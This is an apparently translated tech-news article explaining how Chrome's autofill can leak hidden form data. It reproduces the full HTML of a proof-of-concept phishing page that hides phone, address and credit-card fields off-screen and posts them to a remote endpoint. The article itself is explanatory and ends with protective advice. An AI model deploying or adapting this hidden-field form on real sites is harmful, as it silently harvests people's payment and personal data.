Phishing via autocomplete in Chrome (demo)
It has long been known that the auto-complete function in the browser is an excellent attack vector. The browser easily gives to anyone who wants to save the information to fill in the forms, even if these forms are not visible. And among the stored information in the auto-complete profile can be confidential data. For example, the home address of the user or even bank card details. A person does not always want to share such information by simply entering an e-mail address on any mailing list. And you will have to share it if it has a Chrome browser (in Firefox, they promise to implement a feature in the near future, but it does not work yet).
In the browser, this function works as follows: when you enter one of the fields in a large form, the profile offers to fill in this field and other fields automatically. If the user agrees, the fields are filled in and marked with yellow color.
For most users, auto-complete is a convenient feature that saves time so that you do not manually fill out 10, 20, or more fields. Few of them think that by transferring to the server only one field for auto-completion, he automatically agrees to transfer all the others. But the way it is.
Finnish web developer Viljami Kuosmanen (Viljami Kuosmanen) wrote a simple demo , which clearly demonstrates how phishing occurs through auto-complete.
')
This demo is a simple page with only two fields: name and email address. As usual, you start to fill in the name, options for auto-complete profiles appear - you choose auto-complete. After that, both fields are automatically filled in: name and email address. As expected, they are marked in yellow.
Next, click the "Submit" button and watch the entire set of data from the autocomplete profile that the browser sent to the remote host. Impressive.
Phishing works best in Google Chrome browser. There the transfer of information occurs completely unnoticed by the user. In the Safari browser, the user still sees what extra information is sent to the host. In Firefox, the user needs to manually right-click on each field that he wants to automatically fill out. Thus, phishing does not work at all. Perhaps the Firefox developers have decided to sacrifice the convenience of users for the sake of added security when activating autocomplete profiles. Maybe in vain. History shows that when choosing between convenience and security, most users often choose convenience.
Firefox developers have not yet completed the development of such convenient features as autocomplete profiles, but in the future they will necessarily implement it on the model of Chrome .
In Opera, apparently, auto-complete profiles convey information seamlessly to the user, just like in Chrome.
The source code is published on Github, so if you wish, you can implement such a demo on your website. Now enthusiasts make small changes to the code, but for now the phishing form looks like this:
index.html
<!doctype html> <html> <head> <title>Browser Autofill Phishing</title> </head> <body> <form action="https://httpbin.org/post" method="post"> <p> <label for="name">Name</label><br> <input id="name" name="name" type="text" placeholder="Your Name"> </p> <p> <label for="email">Email</label><br> <input id="email" name="email" type="email" placeholder="Your Email"> </p> <p> <input type="submit" value="Submit"> </p> <p style="margin-left:-500px"> <input id="phone" name="phone" type="text" placeholder="Your Phone"> </p> <p style="margin-left:-500px"> <input id="organization" name="organization" type="text" placeholder="Your Organization"> </p> <p style="margin-left:-500px"> <input id="address" name="address" type="text" placeholder="Your Address"> </p> <p style="margin-left:-500px"> <input id="postal" name="postal" type="text" placeholder="Your Postal Code"> </p> <p style="margin-left:-500px"> <input id="city" name="city" type="text" placeholder="Your City"> </p> <p style="margin-left:-500px"> <select name="country"><option value=""></option><option value="FI">Finland</option><option value="AF">Afghanistan</option><option value="AX">Åland Islands</option><option value="AL">Albania</option><option value="DZ">Algeria</option><option value="AS">American Samoa</option><option value="AD">Andorra</option><option value="AO">Angola</option><option value="AI">Anguilla</option><option value="AQ">Antarctica</option><option value="AG">Antigua & Barbuda</option><option value="AR">Argentina</option><option value="AM">Armenia</option><option value="AW">Aruba</option><option value="AC">Ascension Island</option><option value="AU">Australia</option><option value="AT">Austria</option><option value="AZ">Azerbaijan</option><option value="BS">Bahamas</option><option value="BH">Bahrain</option><option value="BD">Bangladesh</option><option value="BB">Barbados</option><option value="BY">Belarus</option><option value="BE">Belgium</option><option value="BZ">Belize</option><option value="BJ">Benin</option><option value="BM">Bermuda</option><option value="BT">Bhutan</option><option value="BO">Bolivia</option><option value="BA">Bosnia & Herzegovina</option><option value="BW">Botswana</option><option value="BV">Bouvet Island</option><option value="BR">Brazil</option><option value="IO">British Indian Ocean Territory</option><option value="VG">British Virgin Islands</option><option value="BN">Brunei</option><option value="BG">Bulgaria</option><option value="BF">Burkina Faso</option><option value="BI">Burundi</option><option value="KH">Cambodia</option><option value="CM">Cameroon</option><option value="CA">Canada</option><option value="CV">Cape Verde</option><option value="BQ">Caribbean Netherlands</option><option value="KY">Cayman Islands</option><option value="CF">Central African Republic</option><option value="TD">Chad</option><option value="CL">Chile</option><option value="CN">China</option><option value="CX">Christmas Island</option><option value="CC">Cocos [Keeling] Islands</option><option value="CO">Colombia</option><option value="KM">Comoros</option><option value="CD">Congo [DRC]</option><option value="CG">Congo [Republic]</option><option value="CK">Cook Islands</option><option value="CR">Costa Rica</option><option value="CI">Côte d'Ivoire</option><option value="HR">Croatia</option><option value="CW">Curaçao</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DK">Denmark</option><option value="DJ">Djibouti</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="EC">Ecuador</option><option value="EG">Egypt</option><option value="SV">El Salvador</option><option value="GQ">Equatorial Guinea</option><option value="ER">Eritrea</option><option value="EE">Estonia</option><option value="ET">Ethiopia</option><option value="FK">Falkland Islands [Islas Malvinas]</option><option value="FO">Faroe Islands</option><option value="FJ">Fiji</option><option value="FI">Finland</option><option value="FR">France</option><option value="GF">French Guiana</option><option value="PF">French Polynesia</option><option value="TF">French Southern Territories</option><option value="GA">Gabon</option><option value="GM">Gambia</option><option value="GE">Georgia</option><option value="DE">Germany</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GR">Greece</option><option value="GL">Greenland</option><option value="GD">Grenada</option><option value="GP">Guadeloupe</option><option value="GU">Guam</option><option value="GT">Guatemala</option><option value="GG">Guernsey</option><option value="GN">Guinea</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HT">Haiti</option><option value="HM">Heard & McDonald Islands</option><option value="HN">Honduras</option><option value="HK">Hong Kong</option><option value="HU">Hungary</option><option value="IS">Iceland</option><option value="IN">India</option><option value="ID">Indonesia</option><option value="IR">Iran</option><option value="IQ">Iraq</option><option value="IE">Ireland</option><option value="IM">Isle of Man</option><option value="IL">Israel</option><option value="IT">Italy</option><option value="JM">Jamaica</option><option value="JP">Japan</option><option value="JE">Jersey</option><option value="JO">Jordan</option><option value="KZ">Kazakhstan</option><option value="KE">Kenya</option><option value="KI">Kiribati</option><option value="XK">Kosovo</option><option value="KW">Kuwait</option><option value="KG">Kyrgyzstan</option><option value="LA">Laos</option><option value="LV">Latvia</option><option value="LB">Lebanon</option><option value="LS">Lesotho</option><option value="LR">Liberia</option><option value="LY">Libya</option><option value="LI">Liechtenstein</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="MO">Macau</option><option value="MK">Macedonia [FYROM]</option><option value="MG">Madagascar</option><option value="MW">Malawi</option><option value="MY">Malaysia</option><option value="MV">Maldives</option><option value="ML">Mali</option><option value="MT">Malta</option><option value="MH">Marshall Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MU">Mauritius</option><option value="YT">Mayotte</option><option value="MX">Mexico</option><option value="FM">Micronesia</option><option value="MD">Moldova</option><option value="MC">Monaco</option><option value="MN">Mongolia</option><option value="ME">Montenegro</option><option value="MS">Montserrat</option><option value="MA">Morocco</option><option value="MZ">Mozambique</option><option value="MM">Myanmar [Burma]</option><option value="NA">Namibia</option><option value="NR">Nauru</option><option value="NP">Nepal</option><option value="NL">Netherlands</option><option value="NC">New Caledonia</option><option value="NZ">New Zealand</option><option value="NI">Nicaragua</option><option value="NE">Niger</option><option value="NG">Nigeria</option><option value="NU">Niue</option><option value="NF">Norfolk Island</option><option value="MP">Northern Mariana Islands</option><option value="NO">Norway</option><option value="OM">Oman</option><option value="PK">Pakistan</option><option value="PW">Palau</option><option value="PS">Palestine</option><option value="PA">Panama</option><option value="PG">Papua New Guinea</option><option value="PY">Paraguay</option><option value="PE">Peru</option><option value="PH">Philippines</option><option value="PN">Pitcairn Islands</option><option value="PL">Poland</option><option value="PT">Portugal</option><option value="PR">Puerto Rico</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RU">Russia</option><option value="RW">Rwanda</option><option value="WS">Samoa</option><option value="SM">San Marino</option><option value="ST">São Tomé & Príncipe</option><option value="SA">Saudi Arabia</option><option value="SN">Senegal</option><option value="RS">Serbia</option><option value="SC">Seychelles</option><option value="SL">Sierra Leone</option><option value="SG">Singapore</option><option value="SX">Sint Maarten</option><option value="SK">Slovakia</option><option value="SI">Slovenia</option><option value="SB">Solomon Islands</option><option value="SO">Somalia</option><option value="ZA">South Africa</option><option value="GS">South Georgia & South Sandwich Islands</option><option value="KR">South Korea</option><option value="SS">South Sudan</option><option value="ES">Spain</option><option value="LK">Sri Lanka</option><option value="BL">St. Barthélemy</option><option value="SH">St. Helena</option><option value="KN">St. Kitts & Nevis</option><option value="LC">St. Lucia</option><option value="MF">St. Martin</option><option value="PM">St. Pierre & Miquelon</option><option value="VC">St. Vincent & Grenadines</option><option value="SR">Suriname</option><option value="SJ">Svalbard & Jan Mayen</option><option value="SZ">Swaziland</option><option value="SE">Sweden</option><option value="CH">Switzerland</option><option value="TW">Taiwan</option><option value="TJ">Tajikistan</option><option value="TZ">Tanzania</option><option value="TH">Thailand</option><option value="TL">Timor-Leste</option><option value="TG">Togo</option><option value="TK">Tokelau</option><option value="TO">Tonga</option><option value="TT">Trinidad & Tobago</option><option value="TA">Tristan da Cunha</option><option value="TN">Tunisia</option><option value="TR">Turkey</option><option value="TM">Turkmenistan</option><option value="TC">Turks & Caicos Islands</option><option value="TV">Tuvalu</option><option value="UM">US Outlying Islands</option><option value="VI">US Virgin Islands</option><option value="UG">Uganda</option><option value="UA">Ukraine</option><option value="AE">United Arab Emirates</option><option value="GB">United Kingdom</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VU">Vanuatu</option><option value="VA">Vatican City</option><option value="VE">Venezuela</option><option value="VN">Vietnam</option><option value="WF">Wallis & Futuna</option><option value="EH">Western Sahara</option><option value="YE">Yemen</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select> </p> <p style="margin-left:-500px"> <input type="text" name="cc_number"> </p> <p style="margin-left:-500px"> <select name="cc_month" id="cc_month"> <option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select> <select name="cc_year" id="cc_year"> <option>2017</option><option>2018</option><option>2019</option><option>2020</option><option>2021</option><option>2022</option><option>2023</option><option>2024</option><option>2025</option><option>2026</option><option>2027</option><option>2028</option><option>2029</option><option>2030</option><option>2031</option><option>2032</option></select> </p> <p style="margin-left:-500px"> <input type="text" id="cc_cvv" name="cc_cvv"> </p> </form> <script type="text/javascript"> function onchangehandler(event) { // Print out its value. Could be a web request without users' knowledge. console.log(event.target.name + ": " + event.target.value); } // Apply 'input' event to every input element document.querySelectorAll('input').forEach(function(input) { input.addEventListener('input', onchangehandler); } ); </script> </body> </html> From the source code of the
index.html page, it is immediately clear that there are a dozen more data entry fields hidden on it, but all of them are formatted with the "margin-left: -500px" attribute: there is a telephone, place of work, address, postal code, city, country, month and year of expiry of the credit card, credit card number.The user does not see them because of the "margin-left: -500px", and the browser quietly fills each field - and transmits the data.
As it is easy to understand, such an attack is easy to carry out in order to find out the Chrome user's credit card number and other information about it, if only it activates the auto-complete feature on your page.
Perhaps the attack works not only in Chrome, but also in other browsers on its code base. For example, in the Yandex Browser. This browser used to generally merge data for synchronization to anyone via a simple CSRF bug. There is not only information for filling out forms, but also passwords, bookmarks, browser history, etc. Compared to that bug, phishing via autocomplete in Chrome is like a childish prank. Vulnerability was eliminated only in May 2016.
In general, experts have long warned of the dangers of using auto-complete profiles. Warnings sounded right after this feature appeared in Chrome in 2013. Since then, browser developers have failed to implement competent protection against autocompletion of hidden fields.
By the way, a similar trick with filling in invisible forms has long been used to identify bots. Normal users do not fill in the fields that are shifted beyond the visible area of the screen, and bots fill in. The Finnish programmer William Kuosmanen simply applied the same not a trick, but not against bots, but against people.
To protect yourself from the transfer of unwanted data, simply disable the auto-complete profiles in the browser (enabled by default).
Source: https://habr.com/ru/post/357670/
All Articles